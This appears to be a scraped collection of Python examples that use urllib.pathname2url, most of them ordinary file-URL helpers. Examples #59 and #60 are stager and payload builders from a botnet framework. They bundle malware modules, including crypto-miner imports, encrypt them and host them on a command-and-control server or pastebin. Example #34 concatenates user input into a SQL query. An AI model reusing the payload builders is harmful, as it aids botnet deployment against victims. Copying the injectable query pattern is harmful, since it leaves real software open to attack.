    def report_simple_failure(self, scene, reference_filepath, output_filepath, log_filepath, error_message):
        self.failures += 1

        command = self.__make_update_command(output_filepath, reference_filepath)
        self.all_commands.append(command)

        self.file.write(self.__render(self.simple_failure_template,
                                      { 'project-path': scene,
                                        'ref-image-url': urllib.pathname2url(reference_filepath),
                                        'output-image-url': urllib.pathname2url(output_filepath),
                                        'failure-reason': error_message,
                                        'log-file-url': urllib.pathname2url(log_filepath),
                                        'log-file-path': os.path.basename(log_filepath),
                                        'update-command': command }))
        self.file.flush()
Example #31
def path2url(path):
    return urljoin(
        'file:', pathname2url(os.path.abspath(path)))
Example #32
def path2url(path):
    return urlparse.urljoin('file:', pathname2url(path))
Example #33
def path2url(path):
    """URL-encode local path"""
    return urlparse.urljoin('file:', urllib.pathname2url(path.encode('utf-8')))
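To make the effect of these small helpers concrete, a hedged demo (the path is made up; output shown for a POSIX system under Python 2):

import os
import urlparse
from urllib import pathname2url

def path2url_demo(path):
    # Same urljoin/pathname2url pattern as the variants above; unsafe
    # characters such as spaces are percent-encoded by pathname2url.
    return urlparse.urljoin('file:', pathname2url(os.path.abspath(path)))

print path2url_demo('/tmp/my report.pdf')   # file:///tmp/my%20report.pdf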
Example #34

def get_person_id():
    person_id = ''
    extractId = str(sys.argv[1])[-2:]
    connect = sqlite3.connect("Face-DataBase")
    c = connect.cursor()
    cmd = "SELECT * FROM Students WHERE ID = " + extractId
    c.execute(cmd)
    row = c.fetchone()
    person_id = row[3]
    connect.close()
    return person_id


if len(sys.argv) != 1:
    currentDir = os.path.dirname(os.path.abspath(__file__))
    imageFolder = os.path.join(currentDir, "dataset/" + str(sys.argv[1]))
    person_id = get_person_id()
    for filename in os.listdir(imageFolder):
        if filename.endswith(".jpg"):
            print(filename)
            imgurl = urllib.pathname2url(os.path.join(imageFolder, filename))
            res = CF.face.detect(imgurl)
            if len(res) != 1:
                print "No face detected in image"
            else:
                res = CF.person.add_face(imgurl, personGroupId, person_id)
                print(res)
            time.sleep(6)
Example #35
def webpack(config_file, watch_config=None, watch_source=None):
    if not settings.BUNDLE_ROOT:
        raise ImproperlyConfigured(
            'webpack.conf.settings.BUNDLE_ROOT has not been defined.')

    if not settings.BUNDLE_URL:
        raise ImproperlyConfigured(
            'webpack.conf.settings.BUNDLE_URL has not been defined.')

    if not os.path.isabs(config_file):
        abs_path = staticfiles.find(config_file)
        if not abs_path:
            raise ConfigFileNotFound(config_file)
        config_file = abs_path

    if not os.path.exists(config_file):
        raise ConfigFileNotFound(config_file)

    if watch_config is None:
        watch_config = settings.WATCH_CONFIG_FILES

    if watch_source is None:
        watch_source = settings.WATCH_SOURCE_FILES

    try:
        output = js_host_function.call(
            config=config_file,
            watch=watch_source,
            watchDelay=settings.WATCH_DELAY,
            watchConfig=watch_config,
            cache=False,
            fullStats=settings.OUTPUT_FULL_STATS,
            bundleDir=settings.get_path_to_bundle_dir(),
        )
    except FunctionError as e:
        raise six.reraise(BundlingError, BundlingError(*e.args),
                          sys.exc_info()[2])

    stats = json.loads(output)

    if stats['errors']:
        raise BundlingError('{}\n\n{}'.format(config_file,
                                              '\n\n'.join(stats['errors'])))

    if stats['warnings']:
        warnings.warn(stats['warnings'], WebpackWarning)

    # Generate contextual information about the generated assets
    stats['urlsToAssets'] = {}
    path_to_bundle_dir = settings.get_path_to_bundle_dir()
    for asset, config_file in six.iteritems(stats['pathsToAssets']):
        if path_to_bundle_dir in config_file:
            rel_path = config_file[len(path_to_bundle_dir):]
            rel_url = pathname2url(rel_path)
            if rel_url.startswith('/'):
                rel_url = rel_url[1:]
            url = '{}{}/{}/{}'.format(settings.BUNDLE_URL, settings.OUTPUT_DIR,
                                      settings.BUNDLE_DIR, rel_url)
            stats['urlsToAssets'][asset] = url

    return WebpackBundle(stats)
def get_safe_text(text):
    return urllib.pathname2url(text.encode('ascii', 'xmlcharrefreplace'))
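A hedged demonstration of get_safe_text for a non-ASCII input (made-up string; output as on a POSIX system): the xmlcharrefreplace step turns é into &#233;, and pathname2url then percent-encodes the '&', '#' and ';'.

import urllib

def get_safe_text_demo(text):
    # Same body as get_safe_text above, repeated so the demo is self-contained.
    return urllib.pathname2url(text.encode('ascii', 'xmlcharrefreplace'))

print get_safe_text_demo(u'caf\xe9')   # caf%26%23233%3B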
def GetRelativeUrl(module, base_module):
    return urllib.pathname2url(
        os.path.relpath(module.path, os.path.dirname(base_module.path)))
Example #38
 def wsdlURL(self, wsdl_name):
     wsdl_file_path = os.path.join(self.wsdl_dir, wsdl_name)
     # Get the os specific url to deal with windows drive letter
     wsdl_file_url = urllib.pathname2url(wsdl_file_path)
     wsdl_url = urlparse.urljoin('file://', wsdl_file_url)
     return wsdl_url
Example #39
import glob, urllib
import mimetypes

simple_message = """\
From: allan
Content-Type: text/plain

Hello!
"""

# msg = email.message_from_string(simple_message)
# msg = email.message_from_file(open("RESPR1779.msg"))
# email.message_from_file(open())

for file in glob.glob("*"):
    url = urllib.pathname2url(file)
    print(file, mimetypes.guess_type(url))

#print("head", msg.items())
#print("content_type", msg.get_content_type())
#print("body", msg.get_payload())



multipart_message = """\
From: allan
Content-Type: multipart/alternative; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Example #40
 def to_uri(path):
     return urlparse.urljoin("file:", urllib.pathname2url(os.path.abspath(path)))
Example #41
def pathname2fileurl(pathname):
    """Returns a file:// URL for pathname. Handles OS-specific conversions."""
    return urljoin('file:', urllib.pathname2url(pathname))
Example #42
    def display(self, gui):
        """display the planning and set is title with the name
		 of the owner (class X, campus X, user X, manager X ...)
		 get gtk object, initialize button..."""

        from GtkMapper import GtkMapper

        if gui.tabs_is_displayed(self):
            gui.tabs_go_to(self)
            return

        # - set up internal var
        self.refresh = True
        self.finish = False
        file = os.path.abspath('graphics/fullcalendar/view.html')
        self.uri = 'file:' + urllib.pathname2url(file)
        self.display_univ = False
        self.display_campus = False
        self.display_class = False
        self.display_period = False
        self.view_mode = VIEW_MODE_WEEK
        self.date = datetime.date.today()
        self.planning_stack = [self.id]

        # - generate description and title
        if self.type_user:
            if self.type_user.login == app.user.login:
                # current user planning
                self.title = "Mon planning"
            elif self.type_user.type == 'student':
                self.title = str("Etudiant " + self.type_user.login)
            elif self.type_user.type == 'manager':
                self.title = str("Manager " + self.type_user.login)
            elif self.type_user.type == 'admin':
                self.title = str("Administrateur " + self.type_user.login)
            elif self.type_user.type == 'teacher':
                self.title = str("Enseignant " + self.type_user.login)
            self.description = str("Planning de " + self.type_user.firstname +
                                   " " + self.type_user.name)
            if self.type_user.student_class:
                student_class = self.type_user.student_class
                campus = student_class.campus
                self.description += str("\nClasse " + student_class.name)
                self.description += str("\nCampus " + campus.name)

        elif self.type_class:
            self.title = "Classe " + self.type_class.name
            self.description = str("Planning de la classe " +
                                   self.type_class.name)
            self.description += str("\nCampus " + self.type_class.campus.name)
        elif self.type_campus:
            self.title = "Campus " + self.type_campus.name
            self.description = str("Planning du campus " +
                                   self.type_campus.name)
        elif self.type_period:
            self.title = "Période " + self.type_period.name
            self.description = str("Planning de la période " +
                                   self.type_period.name)
        elif self.type_univ:
            self.title = "Université " + self.type_univ.name
            self.description = str("Planning de l'université " +
                                   self.type_univ.name)
        else:
            # should never happen
            print 'unknown planning'
            self.title = "Planning"
            self.description = str("Planning inconnu")

        # - set up gui component
        mapper = GtkMapper('graphics/view_planning.glade', self, app.debug)
        # - set up view gui
        self.toolbar.description.set_text(self.description)
        self.update_date()
        # - set up menu_top gui
        self.calendar.select_month(self.date.month - 1, self.date.year)
        self.calendar.select_day(self.date.day)
        self.calendar.mark_day(self.date.day)
        # - set up html browser with fullcalendar
        self.browser = webkit.WebView()
        self.fullcalendar.add(self.browser)
        self.browser.connect('resource-request-starting', \
            self.resource_request_starting, self)
        self.browser.connect('load-finished', self.load_finished)
        self.browser.connect('title-changed', self.title_changed)
        self.browser.connect('button_press_event', self.button_click)
        self.browser.open(self.uri)
        # - call gui to add widgets,
        gui.tabs_create(self.title, self)
        # - init planning merge
        self.planning_parent = {}
        self.get_planning(self.planning_parent, False)
        self.cb_check_opt_availability()
Example #43
 def path_to_url(path):
     return pathname2url(path.encode('UTF-8'))
def path2url(path):
    """
    Converts a file path into a file URL
    """
    return urlparse.urljoin('file:', urllib.pathname2url(path))
def pathname2url(filename):
    if PYVER >= 3:
        return urllib.request.pathname2url(filename)
    else:
        return urllib.pathname2url(filename)
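A minimal companion sketch showing how such a wrapper might be used to build a version-agnostic file: URL; PYVER and the urllib import are assumed to be defined elsewhere in that module, as in the snippet above.

import os

if PYVER >= 3:                        # assumption: PYVER set as in the wrapper above
    from urllib.parse import urljoin
else:
    from urlparse import urljoin

def path_to_file_url(filename):
    # Convert a local filesystem path to a file: URL on either Python version.
    return urljoin('file:', pathname2url(os.path.abspath(filename)))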
Example #46
def _create_published_file(tk,
                           context,
                           path,
                           name,
                           version_number,
                           task,
                           comment,
                           published_file_type,
                           created_by_user,
                           created_at,
                           version_entity,
                           sg_fields=None,
                           dry_run=False):
    """
    Creates a publish entity in shotgun given some standard fields.

    :param tk: :class:`~sgtk.Sgtk` instance
    :param context: A :class:`~sgtk.Context` to associate with the publish. This will
                    populate the ``task`` and ``entity`` link in Shotgun.
    :param path: The path to the file or sequence we want to publish. If the
                 path is a sequence path it will be abstracted so that
                 any sequence keys are replaced with their default values.
    :param name: A name, without version number, which helps distinguish
               this publish from other publishes. This is typically
               used for grouping inside of Shotgun so that all the
               versions of the same "file" can be grouped into a cluster.
               For example, for a Maya publish, where we track only
               the scene name, the name would simply be that: the scene
               name. For something like a render, it could be the scene
               name, the name of the AOV and the name of the render layer.
    :param version_number: The version number of the item we are publishing.
    :param task: Shotgun Task dictionary to associate with publish or ``None``
    :param comment: Comments string to associate with publish
    :param published_file_type: Shotgun publish type dictionary to
                associate with publish
    :param created_by_user: User entity to associate with publish or ``None``
                if current user (via :meth:`sgtk.util.get_current_user`)
                should be used.
    :param created_at: Timestamp to associate with publish or None for default.
    :param version_entity: Version dictionary to associate with publish or ``None``.
    :param sg_fields: Dictionary of additional data to add to publish.
    :param dry_run: Don't actually create the published file entry. Simply
                    return the data dictionary that would be supplied.

    :returns: The result of the shotgun API create method.
    """

    data = {
        "description": comment,
        "name": name,
        "task": task,
        "version_number": version_number,
    }

    # we set the optional additional fields first so we don't allow overwriting the standard parameters
    if sg_fields is None:
        sg_fields = {}
    data.update(sg_fields)

    if created_by_user:
        data["created_by"] = created_by_user
    else:
        # use current user
        sg_user = login.get_current_user(tk)
        if sg_user:
            data["created_by"] = sg_user

    if created_at:
        data["created_at"] = created_at

    published_file_entity_type = get_published_file_entity_type(tk)

    if published_file_type:
        if published_file_entity_type == "PublishedFile":
            data["published_file_type"] = published_file_type
        else:
            # using legacy type TankPublishedFile
            data["tank_type"] = published_file_type

    if version_entity:
        data["version"] = version_entity

    # Determine the value of the link field based on the given context
    if context.project is None:
        # when running toolkit as a standalone plugin, the context may be
        # empty and not contain a project. Publishes are project entities
        # in Shotgun, so we cannot proceed without a project.
        raise TankError(
            "Your context needs to at least have a project set in order to publish."
        )

    elif context.entity is None:
        # If the context does not have an entity, link it up to the project.
        # This happens for project specific workflows such as editorial
        # workflows, ingest and when running zero config toolkit plugins in
        # a generic project mode.
        data["entity"] = context.project

    else:
        data["entity"] = context.entity

    # set the associated project
    data["project"] = context.project

    # Check if path is a url or a straight file path.  Path
    # is assumed to be a url if it has a scheme:
    #
    #     scheme://netloc/path
    #
    path_is_url = False
    res = urlparse.urlparse(path)
    if res.scheme:
        # handle Windows drive letters - note this adds a limitation
        # but one that is not likely to be a problem as single-character
        # schemes are unlikely!
        if len(res.scheme) > 1 or not res.scheme.isalpha():
            path_is_url = True

    # naming and path logic is different depending on url
    if path_is_url:

        # extract name from url:
        #
        # scheme://hostname.com/path/to/file.ext -> file.ext
        # scheme://hostname.com -> hostname.com
        if res.path:
            # scheme://hostname.com/path/to/file.ext -> file.ext
            data["code"] = res.path.split("/")[-1]
        else:
            # scheme://hostname.com -> hostname.com
            data["code"] = res.netloc

        # make sure that the url is escaped property, otherwise
        # shotgun might not accept it.
        #
        # for quoting logic, see bugfix here:
        # http://svn.python.org/view/python/trunk/Lib/urllib.py?r1=71780&r2=71779&pathrev=71780
        #
        # note: by applying a safe pattern like this, we guarantee that already quoted paths
        #       are not touched, e.g. quote('foo bar') == quote('foo%20bar')
        data["path"] = {
            "url": urllib.quote(path, safe="%/:=&?~#+!$,;'@()*[]"),
            "name": data["code"]  # same as publish name
        }

    else:

        # normalize the path to native slashes
        norm_path = ShotgunPath.normalize(path)
        if norm_path != path:
            log.debug("Normalized input path '%s' -> '%s'" % (path, norm_path))
            path = norm_path

        # convert the abstract fields to their defaults
        path = _translate_abstract_fields(tk, path)

        # name of publish is the filename
        data["code"] = os.path.basename(path)

        # Make path platform agnostic and determine if it belongs
        # to a storage that is associated with this toolkit config.
        storage_name, path_cache = _calc_path_cache(tk, path)

        if path_cache:

            # there is a toolkit storage mapping defined for this storage
            log.debug("The path '%s' is associated with config root '%s'." %
                      (path, storage_name))
            # specify the full path in shotgun
            data["path"] = {"local_path": path}

            # note - #30005 - there appears to be an issue on the serverside
            # related to the explicit storage format and paths containing
            # sequence tokens such as %04d. Commenting out the logic to handle
            # the new explicit storage format for the time being while this is
            # being investigated.

            # # check if the shotgun server supports the storage and relative_path parameters
            # # which allows us to specify exactly which storage to bind a publish to rather
            # # than relying on Shotgun to compute this
            # supports_specific_storage_syntax = (
            #     hasattr(tk.shotgun, "server_caps") and
            #     tk.shotgun.server_caps.version and
            #     tk.shotgun.server_caps.version >= (6, 3, 17)
            # )
            #
            # if supports_specific_storage_syntax:
            #     # explicitly pass relative path and storage to shotgun
            #     storage = tk.shotgun.find_one("LocalStorage", [["code", "is", storage_name]])
            #
            #     if storage is None:
            #         # there is no storage in Shotgun that matches the one toolkit expects.
            #         # this *may* be ok because there may be another storage in Shotgun that
            #         # magically picks up the publishes and associates with them. In this case,
            #         # issue a warning and fall back on the server-side functionality
            #         log.warning(
            #             "Could not find the expected storage '%s' in Shotgun to associate "
            #             "publish '%s' with - falling back to Shotgun's built-in storage "
            #             "resolution logic. It is recommended that you add the '%s' storage "
            #             "to Shotgun" % (storage_name, path, storage_name))
            #         data["path"] = {"local_path": path}
            #
            #     else:
            #         data["path"] = {"relative_path": path_cache, "local_storage": storage}
            #
            # else:
            #     # use previous syntax where we pass the whole path to Shotgun
            #     # and shotgun will do the storage/relative path split server side.
            #     # This operation may do unexpected things if you have multiple
            #     # storages that are identical or overlapping
            #     data["path"] = {"local_path": path}

            # fill in the path cache field which is used for filtering in Shotgun
            # (Shotgun cannot filter directly on local file paths)
            data["path_cache"] = path_cache

        else:

            # path does not map to any configured root - fall back gracefully:
            # 1. look for storages in Shotgun and see if we can create a local path
            # 2. failing that, just register the entry as a file:// resource.
            log.debug("Path '%s' does not have an associated config root." %
                      path)
            log.debug(
                "Will check shotgun local storages to see if there is a match."
            )

            matching_local_storage = False
            for storage in get_cached_local_storages(tk):
                local_storage_path = ShotgunPath.from_shotgun_dict(
                    storage).current_os
                # assume case preserving file systems rather than case sensitive
                if local_storage_path and path.lower().startswith(
                        local_storage_path.lower()):
                    log.debug("Path matches Shotgun local storage '%s'" %
                              storage["code"])
                    matching_local_storage = True
                    break

            if matching_local_storage:
                # there is a local storage matching this path
                # so use that when publishing
                data["path"] = {"local_path": path}

            else:
                # no local storage defined so publish as a file:// url
                log.debug("No local storage matching path '%s' - path will be "
                          "registered as a file:// url." % (path, ))

                # (see http://stackoverflow.com/questions/11687478/convert-a-filename-to-a-file-url)
                file_url = urlparse.urljoin("file:", urllib.pathname2url(path))
                log.debug("Converting '%s' -> '%s'" % (path, file_url))
                data["path"] = {
                    "url": file_url,
                    "name": data["code"]  # same as publish name
                }

    # now call out to hook just before publishing
    data = tk.execute_core_hook(constants.TANK_PUBLISH_HOOK_NAME,
                                shotgun_data=data,
                                context=context)

    if dry_run:
        # add the publish type to be as consistent as possible
        data["type"] = published_file_entity_type
        log.debug(
            "Dry run. Simply returning the data that would be sent to SG: %s" %
            pprint.pformat(data))
        return data
    else:
        log.debug("Registering publish in Shotgun: %s" % pprint.pformat(data))
        return tk.shotgun.create(published_file_entity_type, data)
 def _url_encode(self, url):
     # TODO: test this
     return urllib.pathname2url(url.encode('utf8'))
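# A small, self-contained sketch (not part of the example above) of the two URL
# conversions used by the publish registration code: the "safe" quote pattern
# that leaves already-quoted paths untouched, and the file:// fallback built
# with urlparse.urljoin + urllib.pathname2url. Python 2 is assumed here, to
# match the example.
import urllib
import urlparse

safe_chars = "%/:=&?~#+!$,;'@()*[]"
print(urllib.quote("foo bar", safe=safe_chars))    # foo%20bar
print(urllib.quote("foo%20bar", safe=safe_chars))  # foo%20bar (unchanged)
print(urlparse.urljoin("file:", urllib.pathname2url("/tmp/my file.txt")))
# file:///tmp/my%20file.txt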
Example #48
def make_exttrig_file(cp, ifos, sci_seg, out_dir):
    '''
    Make an ExtTrig xml file containing information on the external trigger.

    Parameters
    ----------
    cp : pycbc.workflow.configuration.WorkflowConfigParser object
        The parsed configuration options of a pycbc.workflow.core.Workflow.
    ifos : str
        String containing the analysis interferometer IDs.
    sci_seg : glue.segments.segment
        The science segment for the analysis run.
    out_dir : str
        The output directory, destination for xml file.

    Returns
    -------
    xml_file : pycbc.workflow.File object
        The xml file with external trigger information.
    '''
    # Initialise objects
    xmldoc = ligolw.Document()
    xmldoc.appendChild(ligolw.LIGO_LW())
    tbl = lsctables.New(lsctables.ExtTriggersTable)
    cols = tbl.validcolumns
    xmldoc.childNodes[-1].appendChild(tbl)
    row = tbl.appendRow()

    # Add known attributes for this GRB
    setattr(row, "event_ra", float(cp.get("workflow", "ra")))
    setattr(row, "event_dec", float(cp.get("workflow", "dec")))
    setattr(row, "start_time", int(cp.get("workflow", "trigger-time")))
    setattr(row, "event_number_grb", str(cp.get("workflow", "trigger-name")))

    # Fill in all remaining columns with default values
    for entry in cols.keys():
        if not hasattr(row, entry):
            if cols[entry] in ['real_4', 'real_8']:
                setattr(row, entry, 0.)
            elif cols[entry] == 'int_4s':
                setattr(row, entry, 0)
            elif cols[entry] == 'lstring':
                setattr(row, entry, '')
            elif entry == 'process_id':
                row.process_id = ilwd.ilwdchar("external_trigger:process_id:0")
            elif entry == 'event_id':
                row.event_id = ilwd.ilwdchar("external_trigger:event_id:0")
            else:
                print("Column %s not recognized" % (entry), file=sys.stderr)
                raise ValueError

    # Save file
    xml_file_name = "triggerGRB%s.xml" % str(cp.get("workflow",
                                                    "trigger-name"))
    xml_file_path = os.path.join(out_dir, xml_file_name)
    utils.write_filename(xmldoc, xml_file_path)
    xml_file_url = urlparse.urljoin("file:",
                                    urllib.pathname2url(xml_file_path))
    xml_file = File(ifos, xml_file_name, sci_seg, file_url=xml_file_url)
    xml_file.PFN(xml_file_url, site="local")

    return xml_file
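# Hypothetical call (the values below are illustrative assumptions, not taken
# from the example): cp must be a WorkflowConfigParser whose [workflow] section
# defines ra, dec, trigger-time and trigger-name, and sci_seg a
# glue.segments.segment covering the analysis time.
#
#   sci_seg = segments.segment(1126259400, 1126261400)
#   xml_file = make_exttrig_file(cp, ifos='H1L1', sci_seg=sci_seg,
#                                out_dir='grb_output')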
Example #49
def open_browser(path):
    try:
        from urllib import pathname2url           # Python 2
    except ImportError:
        from urllib.request import pathname2url   # Python 3
    webbrowser.open("file://" + pathname2url(os.path.abspath(path)))
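# Usage sketch (webbrowser and os are assumed to be imported at module level in
# the file this snippet came from):
#
#   open_browser('build/report.html')   # opens file:///.../build/report.html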
Example #50
def pathname2url(path):
    ''' This filter converts a filesystem path to a URL path.
    :param string path: path to a file
    :returns: the URL-encoded path string
    '''
    return urllib.pathname2url(path)
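# If this filter is meant to be registered with a template engine (an
# assumption -- the engine is not named in the example), a Jinja2 setup could
# look like this:
import urllib
from jinja2 import Environment

env = Environment()
env.filters['pathname2url'] = pathname2url
print(env.from_string("{{ '/tmp/my file.txt' | pathname2url }}").render())
# /tmp/my%20file.txt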
Example #51
 def __str__(self):
     return urlparse.urlunsplit(
         (self.scheme, self.netloc, urllib.pathname2url(self.path),
          self.query, self.fragment))
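# A minimal sketch of an object this __str__ could live on; only the attribute
# names are taken from the method itself, everything else is an assumption.
import urllib
import urlparse

class LocalFileUrl(object):
    def __init__(self, path, scheme='file', netloc='', query='', fragment=''):
        self.scheme, self.netloc, self.path = scheme, netloc, path
        self.query, self.fragment = query, fragment

    def __str__(self):
        return urlparse.urlunsplit(
            (self.scheme, self.netloc, urllib.pathname2url(self.path),
             self.query, self.fragment))

print(LocalFileUrl('/tmp/my file.txt'))  # file:///tmp/my%20file.txt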
Example #52
def url_for_file_path(file_path):
    abs_path = os.path.abspath(file_path)
    return urlparse.urljoin('file:', urllib.pathname2url(abs_path))
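# For example (POSIX, assuming the working directory is /home/user):
#
#   url_for_file_path('my report.html')
#   # -> 'file:///home/user/my%20report.html'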
Example #53

outdir = args.outdir
try:
    os.makedirs(outdir)
except OSError:
    # output directory already exists
    pass

datasets = [
    d for d in os.listdir(args.root) if os.path.isdir(join(args.root, d))
]
n = 5
pages = [
    datasets[i:min(len(datasets), i + n)] for i in range(0, len(datasets), n)
]

idx = open(join(outdir, 'index.html'), 'w')
print("<html><body><ol>", file=idx)
for i, page in enumerate(pages):
    print(i + 1)
    outpath = join(outdir, 'report-page-{:04}.html'.format(i + 1))

    print("<li><a href={url}>{url}</a>".format(
        url=pathname2url(os.path.relpath(outpath, outdir))),
          file=idx)
    save_html(outpath, args.root, page)

print("</ol></body></html>", file=idx)

webbrowser.open(join(outdir, 'index.html'))
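# Illustrative result (assuming 12 dataset directories and n = 5 as above):
# this writes report-page-0001.html through report-page-0003.html plus an
# index.html whose entries are relative, URL-escaped links, e.g.
#
#   <li><a href=report-page-0001.html>report-page-0001.html</a>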
Example #54
def file_line(file_name, full_path, level):
    return ('\t' * level) + '- [%s](%s)' % (os.path.splitext(file_name)[0],
                                            urllib.pathname2url(full_path))
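# Example output (illustrative values):
#
#   file_line('README.md', 'docs/getting started/README.md', 1)
#   # -> '\t- [README](docs/getting%20started/README.md)'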
Example #55
def sanepathname2url(path):
    urlpath = urllib.pathname2url(path)
    if os.name == "nt" and urlpath.startswith("///"):
        urlpath = urlpath[2:]
    # XXX don't ask me about the mac...
    return urlpath
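# On Windows, where the workaround above applies, the behaviour is roughly:
#
#   urllib.pathname2url(r'C:\temp\report.html')  # -> '///C:/temp/report.html'
#   sanepathname2url(r'C:\temp\report.html')     # -> '/C:/temp/report.html'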
Example #56
def directory_line(file_name, full_path, level):
    has_readme = os.path.isfile(os.path.join(full_path, 'README.md'))
    if has_readme:
        entry = '[%s](%s)' % (file_name, urllib.pathname2url(full_path))
    else:
        entry = file_name
    return ('\t' * level) + '- ' + entry
Example #57
 def constructLocalFileUrl(self, filePath):
     return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
Example #58
def main():
    """Entry point for addon execution."""

    path_dict = anki_paths()

    #if user output directory doesn't exist, create it
    if not os.path.exists(path_dict["user"]):
        os.makedirs(path_dict["user"])

    #if user settings file doesn't exist, copy over default xml
    if not os.path.isfile(path_dict["user_xml"]):
        copyfile(path_dict["addon_xml"], path_dict["user_xml"])

    #parse xml into group and error dictionaries
    xml_dicts = xmltools.parse_xml(path_dict["user_xml"])

    #check if pdf output is possible
    (pdf_status,
     path_dict["wkhtmltopdf"]) = check_wkhtmltopdf(path_dict["addon"])

    #create dialog window
    dialog = DialogWindow(*xml_dicts, pdf_status=pdf_status)

    #run dialog window and catch closing signal
    signal = dialog.window.exec_()

    #if window is accepted, collect and return user input
    if signal:
        dimensions, selections, style_text = dialog.collect_input()

    #if the dialog is closed without printing, just return to anki
    else:
        return

    #save user settings to xml
    xmltools.write_xml(dimensions, selections, style_text,
                       path_dict["user_xml"])

    #convert selections to a more convenient form
    units = "in" if selections[0] == 1 else "mm"
    image_separation = selections[1] == 2
    pdf_output = selections[2] == 2

    #progress bar start
    #TODO: add cancellable to options when Anki is updated
    mw.progress.start(label="Converting cards...", immediate=True)

    #output cards as html file
    convert.create_html(dimensions, units, image_separation, style_text,
                        path_dict["html"])

    if pdf_output:
        #output cards as html file
        convert.create_pdf(dimensions, units, path_dict)
        key = "pdf"
    else:
        key = "html"

    #progress bar close
    mw.progress.finish()

    #open file
    file_link = urlparse.urljoin("file:", urllib.pathname2url(path_dict[key]))
    QtGui.QDesktopServices.openUrl(QtCore.QUrl(file_link))

    return
Example #59
def _stager(options, **kwargs):
    #util.display("\n[>]", color='green', style='bright', end=' ')
    #util.display("Stager", color='reset', style='bright')

    assert 'url' in kwargs, "missing keyword argument 'url'"
    assert 'key' in kwargs, "missing keyword argument 'key'"
    assert 'var' in kwargs, "missing keyword argument 'var'"

    if options.encrypt:
        stager = open('core/stagers.py', 'r').read() + generators.main(
            'run', url=kwargs['url'], key=kwargs['key'])
    else:
        stager = open('core/stagers.py', 'r').read() + generators.main(
            'run', url=kwargs['url'])

    if not os.path.isdir('modules/stagers'):
        try:
            os.mkdir('modules/stagers')
        except OSError:
            util.log(
                "Permission denied: unable to make directory './modules/stagers/'"
            )

    if options.compress:
        #util.display("\tCompressing stager... ", color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(stager)
        __load__.set()
        _update(stager, output, task='Compression')
        stager = output

    #util.display("\tUploading stager... ", color='reset', style='normal', end=' ')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(stager, options.pastebin)
    else:
        dirs = [
            'modules/stagers', 'byob/modules/stagers',
            'byob/byob/modules/stagers'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(stager)

        s = 'http://{}:{}/{}'.format(
            C2_HOST,
            int(C2_PORT) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    __load__.set()
    #util.display("(hosting stager at: {})".format(url), color='reset', style='dim')
    return url
Example #60
def _payload(options, **kwargs):
    #util.display("\n[>]", color='green', style='bright', end=' ')
    #util.display("Payload", color='reset', style='bright')

    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"

    loader = open('core/loader.py', 'r').read()
    # generators.loader(host=C2_HOST, port=int(C2_PORT)+2, packages=list(kwargs['hidden']))

    test_imports = '\n'.join([
        'import ' + i for i in list(kwargs['hidden'])
        if i not in ['StringIO', '_winreg', 'pycryptonight', 'pyrx']
    ])
    potential_imports = '''
try:
    import pycryptonight
    import pyrx
except ImportError: pass
'''

    modules = '\n'.join(([
        open(module, 'r').read().partition('# main')[2]
        for module in kwargs['modules']
    ] + [
        generators.main(
            'Payload', **{
                "host": C2_HOST,
                "port": C2_PORT,
                "pastebin": options.pastebin if options.pastebin else str(),
                "gui": "1" if options.gui else str(),
                "owner": options.owner
            }) + '_payload.run()'
    ]))
    payload = '\n'.join((loader, test_imports, potential_imports, modules))

    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            util.log(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.compress:
        #util.display("\tCompressing payload... ", color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        #util.display("\tEncrypting payload... ".format(kwargs['key']), color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    #util.display("\tUploading payload... ", color='reset', style='normal', end=' ')

    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, options.pastebin)
    else:
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(payload)

        s = 'http://{}:{}/{}'.format(
            C2_HOST,
            int(C2_PORT) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    __load__.set()
    #util.display("(hosting payload at: {})".format(url), color='reset', style='dim')
    return url